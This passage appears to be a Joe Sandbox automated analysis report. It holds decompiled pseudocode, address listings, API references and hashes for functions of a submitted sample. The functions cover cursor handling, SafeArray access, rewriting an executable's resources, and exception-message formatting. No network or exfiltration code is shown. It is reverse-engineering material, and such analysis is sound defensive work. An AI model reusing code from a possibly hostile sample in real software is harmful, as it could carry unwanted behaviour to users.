                                                                                                                                                                                                                            0x00439025
                                                                                                                                                                                                                            0x0043902c
                                                                                                                                                                                                                            0x0043902e
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x00439050
                                                                                                                                                                                                                            0x00439058
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439002
                                                                                                                                                                                                                            0x0043906d
                                                                                                                                                                                                                            0x0043907a
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908e
                                                                                                                                                                                                                            0x004390af
                                                                                                                                                                                                                            0x004390b1
                                                                                                                                                                                                                            0x004390b6
                                                                                                                                                                                                                            0x004390b9
                                                                                                                                                                                                                            0x004390bb
                                                                                                                                                                                                                            0x004390e9
                                                                                                                                                                                                                            0x004390f8
                                                                                                                                                                                                                            0x004390fd
                                                                                                                                                                                                                            0x00439103
                                                                                                                                                                                                                            0x004390bd
                                                                                                                                                                                                                            0x004390c5
                                                                                                                                                                                                                            0x004390d1
                                                                                                                                                                                                                            0x004390d6
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x00439090
                                                                                                                                                                                                                            0x00439093
                                                                                                                                                                                                                            0x00439096
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x00439115
                                                                                                                                                                                                                            0x00439118
                                                                                                                                                                                                                            0x00439120
                                                                                                                                                                                                                            0x00439127
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043912e
                                                                                                                                                                                                                            0x00439130
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x0043913a
                                                                                                                                                                                                                            0x00439141
                                                                                                                                                                                                                            0x00439144
                                                                                                                                                                                                                            0x0043914f
                                                                                                                                                                                                                            0x00439150
                                                                                                                                                                                                                            0x00439151
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00438f52
                                                                                                                                                                                                                            0x00438f5e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f64
                                                                                                                                                                                                                            0x00438f69
                                                                                                                                                                                                                            0x00438f6c
                                                                                                                                                                                                                            0x00438f74
                                                                                                                                                                                                                            0x00438f77
                                                                                                                                                                                                                            0x00438f7e
                                                                                                                                                                                                                            0x00438f84
                                                                                                                                                                                                                            0x00438f89
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00438e9d
                                                                                                                                                                                                                            0x00438ea4
                                                                                                                                                                                                                            0x00438ea9
                                                                                                                                                                                                                            0x00438eaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438eb1
                                                                                                                                                                                                                            0x00438eb9
                                                                                                                                                                                                                            0x00438ebc
                                                                                                                                                                                                                            0x00438ebe
                                                                                                                                                                                                                            0x00438ec4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00438F00
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00439025
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043907A
                                                                                                                                                                                                                              • Part of subcall function 00443194: 73751770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                                                                                                                                                                                              • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00439065
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$DesktopWindow$73751770Show
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 978888386-0
                                                                                                                                                                                                                            • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                                                                                                                                                                                            • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                                                                                                                                                                                            0x004107fc
                                                                                                                                                                                                                            0x0041080c
                                                                                                                                                                                                                            0x00410813
                                                                                                                                                                                                                            0x00410813
                                                                                                                                                                                                                            0x0041081e
                                                                                                                                                                                                                            0x0041082c
                                                                                                                                                                                                                            0x0041083b
                                                                                                                                                                                                                            0x00410859
                                                                                                                                                                                                                            0x0041083d
                                                                                                                                                                                                                            0x00410848
                                                                                                                                                                                                                            0x00410848
                                                                                                                                                                                                                            0x00410868
                                                                                                                                                                                                                            0x00410874
                                                                                                                                                                                                                            0x00410877
                                                                                                                                                                                                                            0x00410879
                                                                                                                                                                                                                            0x0041087a
                                                                                                                                                                                                                            0x0041087c
                                                                                                                                                                                                                            0x00410882
                                                                                                                                                                                                                            0x00410884
                                                                                                                                                                                                                            0x00410893
                                                                                                                                                                                                                            0x00410894
                                                                                                                                                                                                                            0x0041089e
                                                                                                                                                                                                                            0x0041089f
                                                                                                                                                                                                                            0x004108a4
                                                                                                                                                                                                                            0x004108af
                                                                                                                                                                                                                            0x004108b0
                                                                                                                                                                                                                            0x004108ba
                                                                                                                                                                                                                            0x004108bb
                                                                                                                                                                                                                            0x004108c0
                                                                                                                                                                                                                            0x004108db
                                                                                                                                                                                                                            0x004108dd
                                                                                                                                                                                                                            0x004108de
                                                                                                                                                                                                                            0x004108e1
                                                                                                                                                                                                                            0x004108e1
                                                                                                                                                                                                                            0x00410882
                                                                                                                                                                                                                            0x004108ea
                                                                                                                                                                                                                            0x004108ed
                                                                                                                                                                                                                            0x004108ef
                                                                                                                                                                                                                            0x004108f0
                                                                                                                                                                                                                            0x004108f6
                                                                                                                                                                                                                            0x004108fc
                                                                                                                                                                                                                            0x004108fe
                                                                                                                                                                                                                            0x00410900
                                                                                                                                                                                                                            0x00410903
                                                                                                                                                                                                                            0x00410906
                                                                                                                                                                                                                            0x00410906
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00410910
                                                                                                                                                                                                                            0x0041091b
                                                                                                                                                                                                                            0x00410923
                                                                                                                                                                                                                            0x0041092a
                                                                                                                                                                                                                            0x00410931
                                                                                                                                                                                                                            0x00410932
                                                                                                                                                                                                                            0x00410937
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410950
                                                                                                                                                                                                                            0x00410954
                                                                                                                                                                                                                            0x0041095a
                                                                                                                                                                                                                            0x0041095b
                                                                                                                                                                                                                            0x0041096b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                                                                                                            • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                                                                                                                                                                                            • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00477370 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				long _v20;
				void* _v24;
				struct HINSTANCE__* _t47;
				int _t53;
				char _t56;
				void* _t61;
				struct HINSTANCE__* _t64;
				intOrPtr _t69;
				intOrPtr _t75;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffec;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t81);
				_push(0x477494);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
				_v13 = _t61 != 0;
				if(_v13 == 0) {
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(0x47749b);
					return E004049E4( &_v12, 2);
				} else {
					 *[fs:eax] = _t83;
					_t64 =  *0x49ec78; // 0x0
					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
					 *((intOrPtr*)( *_t79 + 0xc))();
					E00403BEC(_t79);
					_t47 =  *0x49ec78; // 0x0
					FreeLibrary(_t47);
					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
					asm("sbb eax, eax");
					_v13 = _t53 + 1;
					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
						_t56 = 0;
					} else {
						_t56 = 1;
					}
					_v13 = _t56;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x477479);
					return E0040277C(_v24);
				}
			}



















                                                                                                                                                                                                                            0x00477371
                                                                                                                                                                                                                            0x00477373
                                                                                                                                                                                                                            0x00477379
                                                                                                                                                                                                                            0x0047737c
                                                                                                                                                                                                                            0x00477382
                                                                                                                                                                                                                            0x0047738a
                                                                                                                                                                                                                            0x00477391
                                                                                                                                                                                                                            0x00477392
                                                                                                                                                                                                                            0x00477397
                                                                                                                                                                                                                            0x0047739a
                                                                                                                                                                                                                            0x004773ad
                                                                                                                                                                                                                            0x004773b1
                                                                                                                                                                                                                            0x004773b9
                                                                                                                                                                                                                            0x0047747b
                                                                                                                                                                                                                            0x0047747e
                                                                                                                                                                                                                            0x00477481
                                                                                                                                                                                                                            0x00477493
                                                                                                                                                                                                                            0x004773bf
                                                                                                                                                                                                                            0x004773ca
                                                                                                                                                                                                                            0x004773d3
                                                                                                                                                                                                                            0x004773e5
                                                                                                                                                                                                                            0x004773ed
                                                                                                                                                                                                                            0x004773fb
                                                                                                                                                                                                                            0x00477408
                                                                                                                                                                                                                            0x0047740d
                                                                                                                                                                                                                            0x00477412
                                                                                                                                                                                                                            0x00477418
                                                                                                                                                                                                                            0x00477433
                                                                                                                                                                                                                            0x0047743b
                                                                                                                                                                                                                            0x0047743e
                                                                                                                                                                                                                            0x0047744b
                                                                                                                                                                                                                            0x00477453
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477459
                                                                                                                                                                                                                            0x0047745e
                                                                                                                                                                                                                            0x00477461
                                                                                                                                                                                                                            0x00477464
                                                                                                                                                                                                                            0x00477471
                                                                                                                                                                                                                            0x00477471

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00477433
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$BeginFreeLibrary
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2368538523-0
                                                                                                                                                                                                                            • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                                                                                                                                                                                            • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(E00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00409F88(_v8, _t86);
			}































                                                                                                                                                                                                                            0x0040ced0
                                                                                                                                                                                                                            0x0040cedc
                                                                                                                                                                                                                            0x0040cedf
                                                                                                                                                                                                                            0x0040cee1
                                                                                                                                                                                                                            0x0040ceed
                                                                                                                                                                                                                            0x0040cefc
                                                                                                                                                                                                                            0x0040cf26
                                                                                                                                                                                                                            0x0040cf2c
                                                                                                                                                                                                                            0x0040cf38
                                                                                                                                                                                                                            0x0040cf3d
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf61
                                                                                                                                                                                                                            0x0040cf66
                                                                                                                                                                                                                            0x0040cf6b
                                                                                                                                                                                                                            0x0040cf72
                                                                                                                                                                                                                            0x0040cf7f
                                                                                                                                                                                                                            0x0040cf89
                                                                                                                                                                                                                            0x0040cf8d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cfae
                                                                                                                                                                                                                            0x0040cfb3
                                                                                                                                                                                                                            0x0040cfb7
                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                                                                                                                                                                                            • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CECE Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t75 = 0x40d050;
				_t89 = 0x40d050;
				_t85 =  *0x408034; // 0x408080
				if(E00403D78(_t92, _t85) != 0) {
					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00409F88(_t75, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00409F88(_v8, _t89);
			}































                                                                                                                                                                                                                            0x0040cedc
                                                                                                                                                                                                                            0x0040cedf
                                                                                                                                                                                                                            0x0040cee1
                                                                                                                                                                                                                            0x0040ceed
                                                                                                                                                                                                                            0x0040cefc
                                                                                                                                                                                                                            0x0040cf26
                                                                                                                                                                                                                            0x0040cf2c
                                                                                                                                                                                                                            0x0040cf38
                                                                                                                                                                                                                            0x0040cf3d
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf61
                                                                                                                                                                                                                            0x0040cf66
                                                                                                                                                                                                                            0x0040cf6b
                                                                                                                                                                                                                            0x0040cf72
                                                                                                                                                                                                                            0x0040cf7f
                                                                                                                                                                                                                            0x0040cf89
                                                                                                                                                                                                                            0x0040cf8d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cfae
                                                                                                                                                                                                                            0x0040cfb3
                                                                                                                                                                                                                            0x0040cfb7
                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
